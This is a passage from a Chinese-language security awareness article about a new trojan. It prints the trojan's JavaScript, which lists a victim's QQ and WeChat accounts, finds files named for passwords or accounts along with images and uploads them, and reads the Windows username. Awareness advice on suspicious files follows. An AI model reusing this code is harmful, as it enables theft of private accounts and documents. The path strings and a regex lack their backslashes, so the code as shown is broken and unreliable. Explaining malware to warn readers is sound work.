快来看看你的电脑中毒了吗?新型木马曝光( 二 )

还可以通过对js代码的升级来实现更多新的功能1、获取微信、QQ等隐私信息
function GetQQWechat() {var QQList = [];var WechatList = [];var QQPath = "C:\Users\" + USERNAME+ "\Documents\Tencent Files"var WechatPath = "C:\Users\" + USERNAME+ "\Documents\WeChat Files"var Patt = new RegExp(/[^\]+$/);if (FSO.folderExists(QQPath)) {var QQFolderList = GetFolderList(QQPath);if (QQFolderList) {for (var i = 0; i < QQFolderList.length; i++) {var QQFolderStr = QQFolderList[i];var QQResult = Patt.exec(QQFolderStr);var QQ = "";if (QQResult) QQ = QQResult[0];if (QQ == "All Users") continue;QQList.push(QQ);}}}if (FSO.folderExists(WechatPath)) {var WechatFolderList = GetFolderList(WechatPath);if (WechatFolderList) {for (var i = 0; i < WechatFolderList.length; i++) {var WechatFolderStr = WechatFolderList[i];var WechatResult = Patt.exec(WechatFolderStr);var Wechat = "";if (WechatResult) Wechat = WechatResult[0];if (Wechat == "All Users") continue;WechatList.push(Wechat);}}}return {"QQList":QQList, "WechatList":WechatList}}2、通过政策表达式获取文件名含"账号"、"密码"、"account"、"password"等文件
if (/((账号|密码|password|passwd|account)+(.*)*.(txt|doc|docx|xls|xlsx)$)|(.(JPG|PNG)$)/.test(FileList[i][1])) {UpFile(FileList[i][0], FileList[i][1])}3、获取目标电脑用户名
function GetUserName() {var WshNetwork = new ActiveXObject("WScript.Network");var UserName = WshNetwork.UserName;return UserName; }XHR.setRequestHeader('userName', USERNAME);以上代码仅供研究,请勿非法利用!
结语:
看到这里是不是感觉自己的电脑并非那么的安全,我们在日常使用中,首先要有一定的安全意识,任何文件的传输,不要不做分析就随意双击打开,养成使用杀毒软件查杀的习惯,虽然并不能保证完全被查杀,但最起码也能过滤百分之九十以上的木马文件,剩下的就要靠自己的分析和判断,莫名其妙来源文件不接,图标异常的不接、文件大小与所需要内容不对等的文件不接 。感谢您阅读本期网络安全普及文章,如果本文对您有所帮助请关注点赞哟,如果在网络安全中遇到问题请在评论区或私信留言 。

【快来看看你的电脑中毒了吗?新型木马曝光】


推荐阅读